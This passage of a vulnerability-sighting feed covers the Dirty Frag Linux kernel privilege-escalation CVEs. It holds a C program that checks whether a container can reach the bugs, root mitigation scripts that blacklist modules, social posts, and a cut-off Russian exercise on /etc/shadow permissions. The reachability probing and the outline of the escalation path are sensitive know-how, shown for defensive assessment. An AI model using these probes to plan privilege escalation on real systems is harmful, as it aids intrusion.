0);\n if (s >= 0) {\n close(s);\n reachable = true;\n puts(\" Reachability: REACHABLE - exploitable from this container\");\n } else {\n printf(\" Reachability: blocked (%s, errno %d)\\n\", strerror(errno), errno);\n }\n\n char protos[8192], initstate[64];\n cat(\"/proc/net/protocols\", protos, sizeof(protos));\n bool rxrpc_in_protos = strstr(protos, \"RXRPC\") != NULL;\n bool rxrpc_mod = module_loaded(\"rxrpc\");\n cat(\"/sys/module/rxrpc/initstate\", initstate, sizeof(initstate));\n\n putchar('\\n');\n puts(\" Why (kernel module presence):\");\n printf(\" AF_RXRPC in /proc/net/protocols: %s\\n\", tf(rxrpc_in_protos));\n printf(\" rxrpc.ko loaded: %s\\n\", tf(rxrpc_mod));\n printf(\" /sys/module/rxrpc/initstate: %s\\n\", initstate);\n\n result_t r = { .cve = \"CVE-2026-43500 RxRPC\" };\n if (reachable) {\n r.verdict = \"EXPLOITABLE\";\n snprintf(r.why, sizeof(r.why),\n \"AF_RXRPC socket reachable - bug primitive available\");\n } else {\n r.verdict = \"NOT EXPLOITABLE\";\n snprintf(r.why, sizeof(r.why),\n \"rxrpc kernel module not loaded on node\");\n }\n return r;\n}\n\n// ---------- CVE-2026-43284 xfrm-ESP check ----------\n\nstatic result_t check_xfrm(void) {\n section(\"CVE-2026-43284 - xfrm-ESP Page-Cache Write\");\n puts(\" Family: Dirty Frag chain (patched mainline 2026-05-08)\");\n puts(\" NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-43284\");\n puts(\" Write-up: https://github.com/V4bel/dirtyfrag\");\n puts(\" Trigger: XFRM_MSG_NEWSA over NETLINK_XFRM - requires CAP_NET_ADMIN\");\n puts(\" PoC escape: unshare(CLONE_NEWUSER|CLONE_NEWNET) to acquire\");\n puts(\" CAP_NET_ADMIN inside a fresh user namespace.\");\n puts(\" Distinct: Two-step attack. Standard hardening (drop ALL caps +\");\n puts(\" RuntimeDefault seccomp denying CLONE_NEWUSER) blocks both\");\n puts(\" rungs of the ladder.\");\n putchar('\\n');\n\n // Module presence: SA registration over NETLINK_XFRM returns EPROTONOSUPPORT\n // if neither esp4 nor esp6 is loaded, regardless of how reachable the\n // netlink socket is. Module autoload from inside an unprivileged userns\n // is blocked, so userspace can't fix this.\n bool esp4 = module_loaded(\"esp4\");\n bool esp6 = module_loaded(\"esp6\");\n bool esp_present = esp4 || esp6;\n\n const char *unshare_err = try_unshare(CLONE_NEWUSER | CLONE_NEWNET);\n bool netlink_ok = false;\n const char *netlink_err = NULL;\n if (unshare_err == NULL) {\n int s = socket(AF_NETLINK, SOCK_RAW, NETLINK_XFRM);\n if (s >= 0) { close(s); netlink_ok = true; }\n else { netlink_err = strerror(errno); }\n }\n\n bool reachable = netlink_ok && esp_present;\n\n if (reachable) {\n puts(\" Reachability: REACHABLE - SA registration would succeed\");\n } else if (!esp_present) {\n puts(\" Reachability: blocked - esp4.ko/esp6.ko not loaded on node\");\n puts(\" (NETLINK_XFRM socket may be reachable but SA\");\n puts(\" registration returns EPROTONOSUPPORT)\");\n } else if (unshare_err != NULL) {\n printf(\" Reachability: blocked at unshare(CLONE_NEWUSER|CLONE_NEWNET) - %s\\n\",\n unshare_err);\n } else {\n printf(\" Reachability: userns OK but NETLINK_XFRM blocked (%s)\\n\", netlink_err);\n }\n\n char max_un[64], capeff[64], seccomp[64], nnp[64];\n char unprivuserns[64], lsm[256], uidmap[256];\n cat(\"/proc/sys/user/max_user_namespaces\", max_un, sizeof(max_un));\n cat(\"/proc/sys/kernel/unprivileged_userns_clone\", unprivuserns, sizeof(unprivuserns));\n cat(\"/proc/self/attr/current\", lsm, sizeof(lsm));\n cat(\"/proc/self/uid_map\", uidmap, sizeof(uidmap));\n proc_status_field(\"CapEff\", capeff, sizeof(capeff));\n proc_status_field(\"Seccomp\", seccomp, sizeof(seccomp));\n proc_status_field(\"NoNewPrivs\", nnp, sizeof(nnp));\n\n putchar('\\n');\n puts(\" Why (which layer blocks):\");\n printf(\" esp4.ko loaded on node: %s\\n\", tf(esp4));\n printf(\" esp6.ko loaded on node: %s\\n\", tf(esp6));\n printf(\" Seccomp: %s (2 = filter active)\\n\", seccomp);\n printf(\" NoNewPrivs: %s\\n\", nnp);\n printf(\" CapEff: %s (0 = no caps)\\n\", capeff);\n printf(\" /proc/sys/user/max_user_namespaces: %s\\n\", max_un);\n printf(\" /proc/sys/kernel/unprivileged_userns_clone: %s\\n\", unprivuserns);\n printf(\" AppArmor/SELinux (/proc/self/attr/current): %s\\n\", lsm);\n printf(\" uid_map (in initial userns?): %s\\n\", uidmap);\n\n putchar('\\n');\n puts(\" Per-flag unshare (distinguishes cap check from seccomp):\");\n struct { int flag; const char *label; } flags[] = {\n { CLONE_NEWUSER, \"CLONE_NEWUSER\" },\n { CLONE_NEWNET, \"CLONE_NEWNET\" },\n { CLONE_NEWNS, \"CLONE_NEWNS\" },\n { CLONE_NEWPID, \"CLONE_NEWPID\" },\n };\n for (size_t i = 0; i < sizeof(flags)/sizeof(flags[0]); i++) {\n const char *e = try_unshare(flags[i].flag);\n printf(\" unshare(%-14s): %s\\n\", flags[i].label, e ? e : \"OK\");\n }\n\n result_t r = { .cve = \"CVE-2026-43284 xfrm-ESP\" };\n if (reachable) {\n r.verdict = \"EXPLOITABLE\";\n snprintf(r.why, sizeof(r.why),\n \"userns + NETLINK_XFRM reachable AND esp module loaded\");\n } else if (!esp_present) {\n r.verdict = \"NOT EXPLOITABLE\";\n snprintf(r.why, sizeof(r.why),\n \"neither esp4 nor esp6 module loaded on node \"\n \"(no ESP handler registered)\");\n } else if (unshare_err == NULL && netlink_err != NULL) {\n r.verdict = \"NOT EXPLOITABLE\";\n snprintf(r.why, sizeof(r.why),\n \"userns ok but NETLINK_XFRM socket blocked\");\n } else {\n r.verdict = \"NOT EXPLOITABLE\";\n long max_un_n = strtol(max_un, NULL, 10);\n if (max_un_n == 0) {\n snprintf(r.why, sizeof(r.why),\n \"kernel sysctl forbids user namespace creation\");\n } else {\n snprintf(r.why, sizeof(r.why),\n \"seccomp denies user namespace creation, caps dropped\");\n }\n }\n return r;\n}\n\n// ---------- main ----------\n\nint main(void) {\n puts(\"Dirty Frag CVE reachability + diagnostic check\");\n puts(\"Run from inside the container under test. Read-only, non-destructive.\");\n\n result_t rxrpc = check_rxrpc();\n result_t xfrm = check_xfrm();\n\n section(\"Summary\");\n printf(\" %s - %s - %s\\n\", rxrpc.verdict, rxrpc.cve, rxrpc.why);\n printf(\" %s - %s - %s\\n\", xfrm.verdict, xfrm.cve, xfrm.why);\n\n putchar('\\n');\n puts(\"------ copy-paste summary ------\");\n printf(\"%s - %s - %s\\n\", rxrpc.verdict, rxrpc.cve, rxrpc.why);\n printf(\"%s - %s - %s\\n\", xfrm.verdict, xfrm.cve, xfrm.why);\n puts(\"--------------------------------\");\n\n return 0;\n}", "creation_timestamp": "2026-05-09T17:43:07.000000Z"}, {"uuid": "7f83777f-2c93-4368-b240-c8007147b7c8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://gist.github.com/bottiger1/83d95b500a135a7283504995082a87dd", "content": "#!/usr/bin/env bash\n# CVE-2026-31431 (Copy Fail) | CVE-2026-43284 / CVE-2026-43500 (Dirty Frag)\nset -euo pipefail\n\nRED='\\033[0;31m'; YEL='\\033[1;33m'; GRN='\\033[0;32m'; NC='\\033[0m'\nok() { echo -e \" [${GRN}OK${NC}] $*\"; }\nwarn() { echo -e \" [${YEL}WARN${NC}] $*\"; }\nerr() { echo -e \" [${RED}FAIL${NC}] $*\"; }\n\nCONF=\"/etc/modprobe.d/dirtyfrag.conf\"\nMODS=(algif_aead esp4 esp6 rxrpc)\n\n[[ $EUID -eq 0 ]] || { err \"Run as root\"; exit 1; }\n\nprintf 'install %s /bin/false\\n' \"${MODS[@]}\" > \"$CONF\"\nok \"Wrote $CONF\"\n\nfor mod in \"${MODS[@]}\"; do\n if lsmod | grep -q \"^${mod} \"; then\n rmmod \"$mod\" 2>/dev/null && ok \"Unloaded $mod\" || warn \"Could not unload $mod \u2014 reboot needed\"\n else\n ok \"Not loaded: $mod\"\n fi\ndone\n\necho -e \"\\nVerification:\"\nall_ok=true\nfor mod in \"${MODS[@]}\"; do\n grep -q \"install ${mod} /bin/false\" \"$CONF\" 2>/dev/null \\\n && ok \"Blocked: $mod\" || { err \"Rule missing: $mod\"; all_ok=false; }\n lsmod | grep -q \"^${mod} \" \\\n && { warn \"Still loaded: $mod \u2014 reboot required\"; all_ok=false; }\ndone\n\n$all_ok && echo -e \"\\n${GRN}\u2714 Done.${NC}\" || echo -e \"\\n${YEL}\u26a0 Reboot to complete.${NC}\"", "creation_timestamp": "2026-05-09T20:54:35.000000Z"}, {"uuid": "cdff8284-6671-41b6-b447-d4965cf92e62", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/0xdf.bsky.social/post/3mlhbvqwflc2b", "content": "Diving into Dirty Frag, the second Linux page-cache local privesc in two weeks. CVE-2026-43284 + CVE-2026-43500 provide full distro coverage. \n\nI walk through both variants, the broken disclosure, and demo both versions on the HTB Snapped machine.\n\nwww.youtube.com/watch?v=B5eU...", "creation_timestamp": "2026-05-09T22:23:46.880671Z"}, {"uuid": "7c363ca8-5b77-46bc-b3cc-4dd368c9d637", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://t.me/GithubRedTeam/83571", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a DIRTY-FRAG-Detection-with-Wazuh-4.14.4\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a mym0us3r\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a None\n\u2b50 Star\u6570\u91cf\uff1a 1 | \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-09 23:58:50\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nWazuh 4.14.4 detection rules for CVE-2026-43284 / CVE-2026-43500 (Dirty Frag) - Linux Local Privilege Escalation via page cache write\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-10T00:00:04.000000Z"}, {"uuid": "5a6d94ee-ea4d-4a99-bc3c-04b86bc2a102", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/pmloik.bsky.social/post/3mlhpojezmi2z", "content": "Top 3 CVE for last 7 days:\nCVE-2026-31431: 164 interactions\nCVE-2026-43284: 120 interactions\nCVE-2026-43500: 84 interactions\n\n\nTop 3 CVE for yesterday:\nCVE-2026-43284: 59 interactions\nCVE-2026-43500: 53 interactions\nCVE-2026-31431: 14 interactions\n", "creation_timestamp": "2026-05-10T02:30:15.765128Z"}, {"uuid": "652fa8a1-064b-4c19-865b-d2cd05126b98", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://t.me/GithubRedTeam/83624", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-43500\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a attaattaatta\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Go\n\u2b50 Star\u6570\u91cf\uff1a 0 | \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-10 07:57:52\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nCVE-2026-43500 / CVE-2026-31431 / CVE-2026-43284 golang hotfix\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-10T08:00:04.000000Z"}, {"uuid": "141811cf-cbb0-4ed8-9eb6-efd400fc570d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/adhisimon.kodesumber.com.ap.brid.gy/post/3mlfklfop3ar2", "content": "Habis #CopyFail terbitlah #DirtyFrag\n\n * CVE-2026-43284\n * CVE-2026-43500\n\n\n\nBelum coba sih _poc_ -nya, tapi sepertinya simpel juga.\n\nhttps://github.com/V4bel/dirtyfrag/blob/master/README.md\n\n#linux #cve #infosec", "creation_timestamp": "2026-05-09T05:53:43.381376Z"}, {"uuid": "166d486e-f1e6-4005-b1a1-579464e93565", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/devops-daily.com/post/3mlfocj5dyv2s", "content": "\ud83d\udcdd Dirty Frag (CVE-2026-43284 + CVE-2026-43500): Local Root on Every Major Linux Distro\n\nA two-bug chain in the Linux kernel networking subsystems lets any unprivileged local user become root in a single command. The PoC is public, the...\n\nRead here: https://devops-daily.com/posts/dirty-frag-cve-...", "creation_timestamp": "2026-05-09T07:00:19.369288Z"}, {"uuid": "149d1d44-f2de-4cb3-8617-b31a33dc6c56", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/adriend.linuxtricks.fr/post/3mlfqadh76s2h", "content": "Excellent article en fran\u00e7ais sur la faille Dirty Frag aka la double CVE-2026-43284 et CVE-2026-43500 !\nJe vous recommande grandement sa lecture !\n\nblog.marcfredericgomez.fr/dirty-frag-c...\n\n#Linux #LPE #DirtyFrag", "creation_timestamp": "2026-05-09T07:34:52.300689Z"}, {"uuid": "088c27b5-531f-424e-81ac-968932cfc5b5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/ytroncal.bsky.social/post/3mlfxag26os2y", "content": "Dirty Frag (CVE-2026-43284 et CVE-2026-43500) blog.marcfredericgomez.fr/dirty-frag-c...", "creation_timestamp": "2026-05-09T09:40:13.065775Z"}, {"uuid": "4cb38d89-9130-4097-b2de-a42eb0a2f7fd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/undercode.bsky.social/post/3mlijoq3ck42w", "content": "Dirty Frag: New Linux Page-Cache Local PrivEsc Chain (CVE-2026-43284 & CVE-2026-43500) \u2013 Full Distro Coverage +\u00a0Video\n\nIntroduction: The Linux kernel\u2019s page cache \u2013 a core performance feature that caches filesystem data in memory \u2013 has become the latest attack surface for local privilege\u2026", "creation_timestamp": "2026-05-10T10:15:39.973736Z"}, {"uuid": "94c6b95b-c552-4ee8-bf6b-8e25fff7826f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/shortinfo.bsky.social/post/3mlitjang6426", "content": "Two newly disclosed Linux kernel flaws named Dirty Frag (CVE-2026-43284 and CVE-2026-43500) can be chained into a single command that grants any user root. Microsoft confirmed active exploitation. One patch is out, the other is pending. Ubuntu, Red Hat and Fedora are affected.", "creation_timestamp": "2026-05-10T13:11:35.078559Z"}, {"uuid": "d0745ee1-0906-43a9-8130-e998f2e2cd6c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://gist.github.com/Senci/6dd521104fd36bf9c679975fb9e8b89c", "content": "#!/usr/bin/env bash\n# Dirty Frag mitigation + verification\n# CVE-2026-43284 (xfrm-ESP) / CVE-2026-43500 (RxRPC)\n# Works on Rocky/RHEL and Arch \u2014 idempotent, no reboot required.\n\nset -euo pipefail\n\nCONF=/etc/modprobe.d/dirtyfrag.conf\nMODS=(esp4 esp6 rxrpc)\n\n[[ $EUID -eq 0 ]] || {\n echo \"must run as root\" >&2\n exit 1\n}\n\necho \"=== Dirty Frag mitigation ===\"\necho \"host: $(hostname)\"\necho \"kernel: $(uname -r)\"\necho\n\n# 1. report whether vulnerable .ko files are present on this kernel\necho \"[1/5] vulnerable modules on disk:\"\nfor m in \"${MODS[@]}\"; do\n f=$(find \"/lib/modules/$(uname -r)\" -name \"${m}.ko*\" 2>/dev/null | head -1)\n [[ -n $f ]] && echo \" - $m: $f\" || echo \" - $m: not built for this kernel\"\ndone\necho\n\n# 2. write blacklist\necho \"[2/5] writing $CONF\"\ncat >\"$CONF\" <<'EOF'\n# Dirty Frag mitigation \u2014 block xfrm-ESP and RxRPC page-cache-write LPE\n# CVE-2026-43284 (esp4/esp6), CVE-2026-43500 (rxrpc)\n# Remove this file once distro kernel ships backports.\ninstall esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\nEOF\nchmod 0644 \"$CONF\"\n\n# 3. unload anything currently loaded\necho \"[3/5] unloading currently loaded modules:\"\nfor m in \"${MODS[@]}\"; do\n if lsmod | awk '{print $1}' | grep -qx \"$m\"; then\n if rmmod \"$m\" 2>/dev/null; then\n echo \" - $m: unloaded\"\n else\n echo \" - $m: in use, could not unload (reboot to clear)\"\n fi\n else\n echo \" - $m: not loaded\"\n fi\ndone\n\n# 4. flush page cache (cleans up if exploit had been run pre-mitigation)\necho \"[4/5] flushing page cache\"\nsync\necho 3 >/proc/sys/vm/drop_caches\necho \" - done\"\n\n# 5. verify autoload is blocked (dry-run, does not execute /bin/false)\necho\necho \"[5/5] verifying autoload is blocked:\"\nfail=0\nfor m in \"${MODS[@]}\"; do\n if modprobe -n -v \"$m\" 2>&1 | grep -q '/bin/false'; then\n echo \" - $m: BLOCKED \u2713\"\n else\n echo \" - $m: NOT BLOCKED \u2717\"\n fail=1\n fi\ndone\n\necho\nif [[ $fail -eq 0 ]]; then\n echo \"=== mitigation applied successfully \u2014 no reboot required ===\"\n exit 0\nelse\n echo \"=== mitigation FAILED \u2014 investigate $CONF and modprobe config ===\"\n exit 2\nfi\n", "creation_timestamp": "2026-05-08T19:04:16.000000Z"}, {"uuid": "4647b87c-6d98-4691-8ee2-f8c77da23eff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://bsky.app/profile/nicolas17.xyz/post/3mleijak4qk24", "content": "Did you update your Linux kernel *again* to protect against the last privilege escalation bug?\n\nNo, not CopyFail (CVE-2026-31431), the new DirtyFrag (CVE-2026-43284, CVE-2026-43500).", "creation_timestamp": "2026-05-08T19:44:03.845763Z"}, {"uuid": "eca1553c-ef88-4736-8dcf-93729f73a088", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43500", "type": "seen", "source": "https://gist.github.com/tryharderhvh/aed5f1a11b1565ae4b921a642bce064b", "content": "\u0417\u0430\u0434\u0430\u0447\u0430 1\n\u0423\u0441\u043b\u043e\u0432\u0438\u0435: \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c user, \u0444\u0430\u0439\u043b /etc/shadow, \u043f\u0440\u0430\u0432\u0430 -rw----rw-, \u0432\u043b\u0430\u0434\u0435\u043b\u0435\u0446 root, \u0433\u0440\u0443\u043f\u043f\u0430 user.\n\n\u041a\u0430\u043a Linux \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u0435\u0442 \u043f\u0440\u0430\u0432\u0430: \u0441\u043d\u0430\u0447\u0430\u043b\u0430 \u0441\u043c\u043e\u0442\u0440\u0438\u0442, \u0432\u043b\u0430\u0434\u0435\u043b\u0435\u0446 \u043b\u0438 \u043f\u0440\u043e\u0446\u0435\u0441\u0441, \u0438\u043d\u0430\u0447\u0435 \u2014 \u0432\u0445\u043e\u0434\u0438\u0442 \u043b\u0438 \u0432 \u0433\u0440\u0443\u043f\u043f\u0443 \u0444\u0430\u0439\u043b\u0430, \u0438\u043d\u0430\u0447\u0435 \u2014 \u043f\u0440\u0438\u043c\u0435\u043d\u044f\u0435\u0442 other. \u041f\u0440\u043e\u0432\u0435\u0440\u043a\u0430 \u043e\u0441\u0442\u0430\u043d\u0430\u0432\u043b\u0438\u0432\u0430\u0435\u0442\u0441\u044f \u043d\u0430 \u043f\u0435\u0440\u0432\u043e\u043c \u0441\u043e\u0432\u043f\u0430\u0434\u0435\u043d\u0438\u0438 \u043a\u0430\u0442\u0435\u0433\u043e\u0440\u0438\u0438, \u0434\u0430\u0436\u0435 \u0435\u0441\u043b\u0438 \u0435\u0451 \u0431\u0438\u0442\u044b \u0441\u0442\u0440\u043e\u0436\u0435, \u0447\u0435\u043c other.\n\n\u041f\u0440\u0438\u043c\u0435\u043d\u0435\u043d\u0438\u0435 \u043a user:\n- \u0412\u043b\u0430\u0434\u0435\u043b\u0435\u0446? \u041d\u0435\u0442, \u0432\u043b\u0430\u0434\u0435\u043b\u0435\u0446 root.\n- \u0412 \u0433\u0440\u0443\u043f\u043f\u0435 user? \u0414\u0430, \u044d\u0442\u043e \u0435\u0433\u043e \u0441\u043e\u0431\u0441\u0442\u0432\u0435\u043d\u043d\u0430\u044f primary-\u0433\u0440\u0443\u043f\u043f\u0430 (\u0441\u0445\u0435\u043c\u0430 User Private Group, \u0434\u0435\u0444\u043e\u043b\u0442 \u0432 Debian/Ubuntu/RHEL/Fedora). \u0423\u0441\u043b\u043e\u0432\u0438\u0435 \u0437\u0430\u0434\u0430\u0447\u0438 \u044d\u0442\u043e \u043f\u043e\u0434\u0440\u0430\u0437\u0443\u043c\u0435\u0432\u0430\u0435\u0442: \u0441\u043e\u0432\u043f\u0430\u0434\u0435\u043d\u0438\u0435 \u0438\u043c\u0451\u043d \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0438 \u0433\u0440\u0443\u043f\u043f\u044b \u0444\u0430\u0439\u043b\u0430 \u0443\u043a\u0430\u0437\u044b\u0432\u0430\u0435\u0442 \u043d\u0430 UPG. \u0415\u0441\u043b\u0438 \u0431\u044b \u0441\u0438\u0441\u0442\u0435\u043c\u0430 \u0431\u044b\u043b\u0430 \u043d\u0435-UPG \u0438 user \u0432 \u0433\u0440\u0443\u043f\u043f\u0443 user \u043d\u0435 \u0432\u0445\u043e\u0434\u0438\u043b, \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0430 \u043f\u0430\u0434\u0430\u043b\u0430 \u0431\u044b \u0432 other \u2192 rw- \u2192 \u0434\u043e\u0441\u0442\u0443\u043f \u0431\u044b\u043b \u0431\u044b \u043e\u0442\u043a\u0440\u044b\u0442. \u0412\u0441\u0435 \u0434\u0430\u043b\u044c\u043d\u0435\u0439\u0448\u0438\u0435 \u0432\u044b\u0432\u043e\u0434\u044b Task 1 \u0441\u0442\u0440\u043e\u044f\u0442\u0441\u044f \u043d\u0430 UPG-\u0434\u043e\u043f\u0443\u0449\u0435\u043d\u0438\u0438.\n- \u041f\u0440\u0438\u043c\u0435\u043d\u044f\u044e\u0442\u0441\u044f group-\u0431\u0438\u0442\u044b: --- \u2192 \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u043d\u0435\u0442.\n\n\u0411\u0438\u0442\u044b rw- \u0438\u0437 other \u043d\u0435\u0434\u043e\u0441\u0442\u0438\u0436\u0438\u043c\u044b, \u043f\u043e\u0442\u043e\u043c\u0443 \u0447\u0442\u043e \u044f\u0434\u0440\u043e \u043e\u0441\u0442\u0430\u043d\u0430\u0432\u043b\u0438\u0432\u0430\u0435\u0442\u0441\u044f \u043d\u0430 \u0441\u043e\u0432\u043f\u0430\u0434\u0435\u043d\u0438\u0438 \u0433\u0440\u0443\u043f\u043f\u044b.\n\n\u041e\u0442\u0432\u0435\u0442: \u043f\u043e\u0432\u044b\u0441\u0438\u0442\u044c \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0438 \u043d\u0430\u043f\u0440\u044f\u043c\u0443\u044e \u0447\u0435\u0440\u0435\u0437 /etc/shadow \u0432 \u044d\u0442\u043e\u0439 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0438 \u043d\u0435\u043b\u044c\u0437\u044f. Open(O_RDONLY) \u0438 open(O_WRONLY) \u0432\u0435\u0440\u043d\u0443\u0442 EACCES.\n\n\u0421\u043f\u043e\u0441\u043e\u0431\u044b \u043e\u0431\u0445\u043e\u0434\u0430 \u0438 \u043f\u043e\u0447\u0435\u043c\u0443 \u043e\u043d\u0438 \u043d\u0435 \u0440\u0430\u0431\u043e\u0442\u0430\u044e\u0442:\n- newgrp / sg \u2014 \u043c\u0435\u043d\u044f\u044e\u0442 \u0442\u043e\u043b\u044c\u043a\u043e primary GID, supplementary-\u0447\u043b\u0435\u043d\u0441\u0442\u0432\u043e \u0432 user \u0441\u043e\u0445\u0440\u0430\u043d\u044f\u0435\u0442\u0441\u044f.\n- setgroups(0, NULL) \u0438 setpriv --clear-groups \u2014 \u0442\u0440\u0435\u0431\u0443\u044e\u0442 CAP_SETGID, \u043a\u043e\u0442\u043e\u0440\u043e\u0433\u043e \u0443 \u043d\u0435\u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u043d\u0435\u0442.\n- User namespaces (unshare -Urm) \u2014 DAC-\u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0430 \u044f\u0434\u0440\u0430 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 kuid/kgid \u0438 \u043d\u0435 \u043f\u0435\u0440\u0435\u0441\u0447\u0438\u0442\u044b\u0432\u0430\u0435\u0442 \u0438\u0445 \u043f\u043e\u0434 user-namespace mapping. \u0421\u0431\u0440\u043e\u0441\u0438\u0442\u044c supplementary-\u0433\u0440\u0443\u043f\u043f\u044b \u0442\u043e\u0436\u0435 \u043d\u0435\u043b\u044c\u0437\u044f: \u0434\u043b\u044f \u043d\u0435\u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0433\u043e userns \u044f\u0434\u0440\u043e \u043f\u0440\u0438\u043d\u0443\u0434\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u0441\u0442\u0430\u0432\u0438\u0442 /proc/PID/setgroups=deny, \u043f\u043e\u044d\u0442\u043e\u043c\u0443 setgroups(0, NULL) \u0432\u043d\u0443\u0442\u0440\u0438 namespace \u043d\u0435 \u0441\u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442. \u0413\u0440\u0443\u043f\u043f\u0430 user \u043e\u0441\u0442\u0430\u0451\u0442\u0441\u044f \u0432 credentials \u2192 in_group_p() \u0432\u043e\u0437\u0432\u0440\u0430\u0449\u0430\u0435\u0442 true \u2192 \u043f\u0440\u0438\u043c\u0435\u043d\u044f\u044e\u0442\u0441\u044f group-\u0431\u0438\u0442\u044b --- \u2192 \u0434\u043e\u0441\u0442\u0443\u043f \u0437\u0430\u043a\u0440\u044b\u0442.\n- Bind-mount, hardlink, \u043a\u043e\u043f\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 \u2014 \u043d\u0435 \u043c\u0435\u043d\u044f\u044e\u0442 \u043f\u0440\u0430\u0432\u0430 \u0438\u0441\u0445\u043e\u0434\u043d\u043e\u0433\u043e inode \u0438 \u0441\u0430\u043c\u0438 \u0442\u0440\u0435\u0431\u0443\u044e\u0442 read-\u0434\u043e\u0441\u0442\u0443\u043f\u0430.\n\n\u0414\u043e\u043f\u0443\u0449\u0435\u043d\u0438\u0435: \u043d\u0430 /etc/shadow \u043d\u0435\u0442 POSIX ACL. Named-user ACL \u0432\u044b\u0447\u0438\u0441\u043b\u044f\u0435\u0442\u0441\u044f \u0440\u0430\u043d\u044c\u0448\u0435 group/other, \u043f\u043e\u044d\u0442\u043e\u043c\u0443 \u0437\u0430\u043f\u0438\u0441\u044c \u0432\u0438\u0434\u0430 `user:user:rw-` \u043f\u0435\u0440\u0435\u043a\u0440\u044b\u043b\u0430 